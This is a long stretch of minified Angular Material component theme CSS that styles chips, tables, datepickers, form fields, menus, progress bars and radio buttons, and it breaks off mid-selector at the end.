.mat-ripple-element[_ngcontent-%COMP%]{background:#f44336}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]{background-color:#e0e0e0;color:#000000de}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#000000de;opacity:.4}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled):active{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled)   .mat-chip-remove[_ngcontent-%COMP%]:hover{opacity:.54}.mat-chip.mat-standard-chip.mat-chip-disabled[_ngcontent-%COMP%]{opacity:.4}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]:after{background:black}.mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-table[_ngcontent-%COMP%]{background:white}.mat-table[_ngcontent-%COMP%]   thead[_ngcontent-%COMP%], .mat-table[_ngcontent-%COMP%]   tbody[_ngcontent-%COMP%], .mat-table[_ngcontent-%COMP%]   tfoot[_ngcontent-%COMP%], mat-header-row[_ngcontent-%COMP%], mat-row[_ngcontent-%COMP%], mat-footer-row[_ngcontent-%COMP%], [mat-header-row][_ngcontent-%COMP%], [mat-row][_ngcontent-%COMP%], [mat-footer-row][_ngcontent-%COMP%], .mat-table-sticky[_ngcontent-%COMP%]{background:inherit}mat-row[_ngcontent-%COMP%], mat-header-row[_ngcontent-%COMP%], mat-footer-row[_ngcontent-%COMP%], th.mat-header-cell[_ngcontent-%COMP%], td.mat-cell[_ngcontent-%COMP%], td.mat-footer-cell[_ngcontent-%COMP%]{border-bottom-color:#0000001f}.mat-header-cell[_ngcontent-%COMP%]{color:#0000008a}.mat-cell[_ngcontent-%COMP%], .mat-footer-cell[_ngcontent-%COMP%]{color:#000000de}.mat-calendar-arrow[_ngcontent-%COMP%]{fill:#0000008a}.mat-datepicker-toggle[_ngcontent-%COMP%], .mat-datepicker-content[_ngcontent-%COMP%]   .mat-calendar-next-button[_ngcontent-%COMP%], .mat-datepicker-content[_ngcontent-%COMP%]   .mat-calendar-previous-button[_ngcontent-%COMP%]{color:#0000008a}.mat-calendar-table-header-divider[_ngcontent-%COMP%]:after{background:rgba(0,0,0,.12)}.mat-calendar-table-header[_ngcontent-%COMP%], .mat-calendar-body-label[_ngcontent-%COMP%]{color:#0000008a}.mat-calendar-body-cell-content[_ngcontent-%COMP%], .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#000000de;border-color:transparent}.mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){color:#00000061}.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#00000061}.mat-calendar-body-in-preview[_ngcontent-%COMP%]{color:#0000003d}.mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#00000061}.mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#0000002e}.mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(33,150,243,.2)}.mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f366}.mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}@media (hover: hover){.mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}}.mat-datepicker-content[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f;background-color:#fff;color:#000000de}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(123,31,162,.2)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa266}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}@media (hover: hover){.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(244,67,54,.2)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f4433666}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}@media (hover: hover){.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}}.mat-datepicker-content-touch[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.mat-datepicker-toggle-active[_ngcontent-%COMP%]{color:#2196f3}.mat-datepicker-toggle-active.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-datepicker-toggle-active.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-date-range-input-inner[disabled][_ngcontent-%COMP%]{color:#00000061}.mat-dialog-container[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f;background:white;color:#000000de}.mat-divider[_ngcontent-%COMP%]{border-top-color:#0000001f}.mat-divider-vertical[_ngcontent-%COMP%]{border-right-color:#0000001f}.mat-expansion-panel[_ngcontent-%COMP%]{background:white;color:#000000de}.mat-expansion-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-action-row[_ngcontent-%COMP%]{border-top-color:#0000001f}.mat-expansion-panel[_ngcontent-%COMP%]   .mat-expansion-panel-header.cdk-keyboard-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .mat-expansion-panel[_ngcontent-%COMP%]   .mat-expansion-panel-header.cdk-program-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded)   .mat-expansion-panel-header[_ngcontent-%COMP%]:hover:not([aria-disabled=true]){background:rgba(0,0,0,.04)}@media (hover: none){.mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded):not([aria-disabled=true])   .mat-expansion-panel-header[_ngcontent-%COMP%]:hover{background:white}}.mat-expansion-panel-header-title[_ngcontent-%COMP%]{color:#000000de}.mat-expansion-panel-header-description[_ngcontent-%COMP%], .mat-expansion-indicator[_ngcontent-%COMP%]:after{color:#0000008a}.mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]{color:#00000042}.mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]   .mat-expansion-panel-header-title[_ngcontent-%COMP%], .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%]{color:inherit}.mat-expansion-panel-header[_ngcontent-%COMP%]{height:48px}.mat-expansion-panel-header.mat-expanded[_ngcontent-%COMP%]{height:64px}.mat-form-field-label[_ngcontent-%COMP%], .mat-hint[_ngcontent-%COMP%]{color:#0009}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#2196f3}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-focused[_ngcontent-%COMP%]   .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#000000de}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid)   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#2196f3}.mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-accent   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#7b1fa2}.mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-warn   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label.mat-accent[_ngcontent-%COMP%], .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]   .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#f44336}.mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%], .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#f44336}.mat-error[_ngcontent-%COMP%]{color:#f44336}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-hint[_ngcontent-%COMP%]{color:#0000008a}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#0000006b}.mat-form-field-appearance-legacy.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(0,0,0,.42) 0%,rgba(0,0,0,.42) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.mat-form-field-appearance-standard[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#0000006b}.mat-form-field-appearance-standard.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(0,0,0,.42) 0%,rgba(0,0,0,.42) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#0000000a}.mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#00000005}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:#0000006b}.mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#00000061}.mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:transparent}.mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-outline[_ngcontent-%COMP%]{color:#0000001f}.mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#000000de}.mat-form-field-appearance-outline.mat-focused[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#2196f3}.mat-form-field-appearance-outline.mat-focused.mat-accent[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field-appearance-outline.mat-focused.mat-warn[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%], .mat-form-field-appearance-outline.mat-form-field-invalid.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#f44336}.mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#00000061}.mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-outline[_ngcontent-%COMP%]{color:#0000000f}.mat-icon.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.mat-icon.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-icon.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-form-field-type-mat-native-select[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#0000008a}.mat-input-element[_ngcontent-%COMP%]:disabled, .mat-form-field-type-mat-native-select.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#00000061}.mat-input-element[_ngcontent-%COMP%]{caret-color:#2196f3}.mat-input-element[_ngcontent-%COMP%]::placeholder{color:#0000006b}.mat-input-element[_ngcontent-%COMP%]::-moz-placeholder{color:#0000006b}.mat-input-element[_ngcontent-%COMP%]::-webkit-input-placeholder{color:#0000006b}.mat-input-element[_ngcontent-%COMP%]:-ms-input-placeholder{color:#0000006b}.mat-form-field.mat-accent[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:#7b1fa2}.mat-form-field.mat-warn[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%], .mat-form-field-invalid[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:#f44336}.mat-form-field-type-mat-native-select.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.mat-list-base[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%], .mat-list-base[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]{color:#000000de}.mat-list-base[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{color:#0000008a}.mat-list-base[_ngcontent-%COMP%]   .mat-list-item-disabled[_ngcontent-%COMP%]{background-color:#eee;color:#00000061}.mat-list-option[_ngcontent-%COMP%]:hover, .mat-list-option[_ngcontent-%COMP%]:focus, .mat-nav-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:hover, .mat-nav-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:focus, .mat-action-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:hover, .mat-action-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:focus{background:rgba(0,0,0,.04)}.mat-list-single-selected-option[_ngcontent-%COMP%], .mat-list-single-selected-option[_ngcontent-%COMP%]:hover, .mat-list-single-selected-option[_ngcontent-%COMP%]:focus{background:rgba(0,0,0,.12)}.mat-menu-panel[_ngcontent-%COMP%]{background:white}.mat-menu-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-menu-item[_ngcontent-%COMP%]{background:transparent;color:#000000de}.mat-menu-item[disabled][_ngcontent-%COMP%], .mat-menu-item[disabled][_ngcontent-%COMP%]   .mat-menu-submenu-icon[_ngcontent-%COMP%], .mat-menu-item[disabled][_ngcontent-%COMP%]   .mat-icon-no-color[_ngcontent-%COMP%]{color:#00000061}.mat-menu-item[_ngcontent-%COMP%]   .mat-icon-no-color[_ngcontent-%COMP%], .mat-menu-submenu-icon[_ngcontent-%COMP%]{color:#0000008a}.mat-menu-item[_ngcontent-%COMP%]:hover:not([disabled]), .mat-menu-item.cdk-program-focused[_ngcontent-%COMP%]:not([disabled]), .mat-menu-item.cdk-keyboard-focused[_ngcontent-%COMP%]:not([disabled]), .mat-menu-item-highlighted[_ngcontent-%COMP%]:not([disabled]){background:rgba(0,0,0,.04)}.mat-paginator[_ngcontent-%COMP%]{background:white}.mat-paginator[_ngcontent-%COMP%], .mat-paginator-page-size[_ngcontent-%COMP%]   .mat-select-trigger[_ngcontent-%COMP%]{color:#0000008a}.mat-paginator-decrement[_ngcontent-%COMP%], .mat-paginator-increment[_ngcontent-%COMP%]{border-top:2px solid rgba(0,0,0,.54);border-right:2px solid rgba(0,0,0,.54)}.mat-paginator-first[_ngcontent-%COMP%], .mat-paginator-last[_ngcontent-%COMP%]{border-top:2px solid rgba(0,0,0,.54)}.mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-decrement[_ngcontent-%COMP%], .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-increment[_ngcontent-%COMP%], .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-first[_ngcontent-%COMP%], .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-last[_ngcontent-%COMP%]{border-color:#00000061}.mat-paginator-container[_ngcontent-%COMP%]{min-height:56px}.mat-progress-bar-background[_ngcontent-%COMP%]{fill:#c0ddf5}.mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#c0ddf5}.mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#2196f3}.mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#d7c0e0}.mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#d7c0e0}.mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#7b1fa2}.mat-progress-bar.mat-warn[_ngcontent-%COMP%]   .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#f5c9c5}.mat-progress-bar.mat-warn[_ngcontent-%COMP%]   .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#f5c9c5}.mat-progress-bar.mat-warn[_ngcontent-%COMP%]   .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#f44336}.mat-progress-spinner[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .mat-spinner[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#2196f3}.mat-progress-spinner.mat-accent[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .mat-spinner.mat-accent[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#7b1fa2}.mat-progress-spinner.mat-warn[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .mat-spinner.mat-warn[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#f44336}.mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#0000008a}.mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#2196f3}.mat-radio-button.mat-primary[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .mat-radio-button.mat-primary[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-persistent-ripple[_ngcontent-%COMP%], .mat-radio-button.mat-primary[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#7b1fa2}.mat-radio-button.mat-accent[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .mat-radio-button.mat-accent[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-persistent-ripple[_ngcontent-%COMP%], .mat-radio-button.mat-accent[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#f44336}.mat-radio-button.mat-warn[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .mat-radio-button.mat-warn[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%]   